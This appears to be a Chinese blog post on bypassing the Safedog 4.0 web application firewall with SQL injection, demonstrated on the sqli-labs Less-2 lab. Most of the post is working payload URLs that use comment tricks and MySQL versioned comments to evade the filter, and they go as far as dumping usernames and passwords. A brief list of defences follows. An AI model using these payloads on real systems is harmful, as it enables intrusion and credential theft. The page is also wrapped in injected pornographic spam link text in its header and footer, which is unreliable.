<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      sql注入bypass安全狗4.0

      安全狗4.0繞過:

      拿sqllib第二關舉例,因為是數字型注入,也就不用引入單引號

      http://192.168.228.11/mysql/Less-2/?id=1

      繞過空格

      image

      image

      image

      進行fuzz發現/**/內用以上字符可以實現繞過

      image

      繞過and

      and 不攔截

      and 1=1 攔截

      and 1 攔截

      image

      1./!/配合版本號繞過

      如果是/*xxx*/里面的xxx不執行

      如果是/*!50000xxxx*/ 如果mysql版面大于5.00.00 后面的xxxx就會被直接執行

      如果!后面不加版本號,后面的xxxx自動執行

      /*小于當前mysql版本號1*/=/*小于當前mysql版本號1*/ --> 1=1

      payload:
      http://192.168.228.11/mysql/Less-2/?id=1 and /*!500001*/=/*!500001*/--+

      image

      2.if((1>2),1,2)

      payload:
      http://192.168.228.11/mysql/Less-2/?id=if((1>2),1,2)--+

      image

      3.用繞過空格的方法

      payload:
      http://192.168.228.11/mysql/Less-2/?id=1 and/*//*/1=1 --+

      image

      image

      繞過order by

      用繞過空格的方法實現繞過

      payload:
      http://192.168.228.11/mysql/Less-2/?id=1 order/*//*/by 3 --+

      image

      image

      繞過union select

      經過fuzz發現:

      繞過空格的/*//*/也被攔截了

      union 不攔截

      union a 不攔截

      select 不攔截

      a select 不攔截

      union select 攔截

      使用版本號過濾:

      payload:
      http://192.168.228.11/mysql/Less-2/?id=-1 union/*//*//*!500001select*//*//*/1,2,3--+

      image

      還是顯示攔截

      image

      image

      進行fuzz發現/*!*/內用以上字符可以實現繞過

      image

      payload:
      http://192.168.228.11/mysql/Less-2/?id=-1 union/*//*//*!50044select*//*//*/1,2,3--+

      image

      查詢當前用戶

      user 不攔截

      user() 攔截

      user(/*//*/) 不攔截

      image

      查詢當前數據庫

      database 不攔截

      database() 攔截

      database(/*//*/) 不攔截

      image

      查詢當前數據庫的表

      group_concat(table_name) 不攔截

      from 不攔截

      information_schema.tables 不攔截

      where 不攔截

      table_schema 不攔截

      但最后輸出被攔截

      http://192.168.228.11/mysql/Less-2/?id=-1 union/*//*//*!50044select*//*//*/1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database(/*//*/) --+

      image

      再fuzz一下select里面的參數

      image

      發現為50440-50449時可以實現繞過

      payload:
      http://192.168.228.11/mysql/Less-2/?id=-1 union/*//*//*!50440select*//*//*/1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database(/*//*/) --+

      image

      或者表名用16進制表示

      payload:
      http://192.168.228.11/mysql/Less-2/?id=-1 union/*//*//*!50440select*//*//*/1,group_concat(table_name) ,3 from information_schema.tables where table_schema=0x7365637572697479 --+

      image

      查詢表中字段

      與獲取當前數據的表一致

      payload:
      http://192.168.228.11/mysql/Less-2/?id=-1 union/*//*//*!50440select*//*//*/1,group_concat(column_name) ,3 from information_schema.columns where table_schema=database(/*//*/) --+

      image

      查詢字段值

      與前幾個差不多

      payload:
      http://192.168.228.11/mysql/Less-2/?id=-1 union/*//*//*!50440select*//*//*/1,group_concat(username,'-',password) ,3 from users --+

      image

      sql注入防御

      1.部署WAF,防火墻

      2.限制關鍵字的輸入,如' " ) #

      3.對用戶輸入的內容進行轉義,限制輸入的長度

      4.使用預編譯對SQL語句預處理,進行參數綁定,最后傳入參數

      posted @ 2021-06-06 22:01  cAr7n  閱讀(548)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 7m精品福利视频导航| 福利一区二区在线观看| 亚洲色一区二区三区四区| 中文字幕av无码免费一区| 国内自拍第一区二区三区| 亚洲精品成人福利网站| 麻豆国产成人av高清在线| 国产一区二区三区18禁| 97成人碰碰久久人人超级碰oo| 亚洲国产色婷婷久久99精品91| 亚洲Av综合日韩精品久久久| 色就色偷拍综合一二三区| 免费夜色污私人影院在线观看| 白丝乳交内射一二三区| 午夜爽爽爽男女免费观看影院| 国产av无码专区亚洲av软件| 国产毛片欧美毛片久久久| 亚洲精品一区二区三区大| 国产精品成人午夜福利| 无码免费中文字幕视频| 国产精品自在拍在线播放| 好爽毛片一区二区三区四| 亚洲精品无amm毛片| 国产综合一区二区三区麻豆| 额敏县| 精品久久久bbbb人妻| 99久久无码私人网站| 18禁在线永久免费观看| 青青草国产自产一区二区| 日韩国产中文字幕精品| av色综合久久天堂av色综合在| 亚洲一区二区三区久久受| 黄色三级亚洲男人的天堂| 国内精品久久久久影院薰衣草| 91网站在线看| 亚成区成线在人线免费99| 国产精品无码成人午夜电影| 亚洲午夜亚洲精品国产成人| 亚洲av与日韩av在线| 野花香电视剧免费观看全集高清播放 | 久久久精品94久久精品|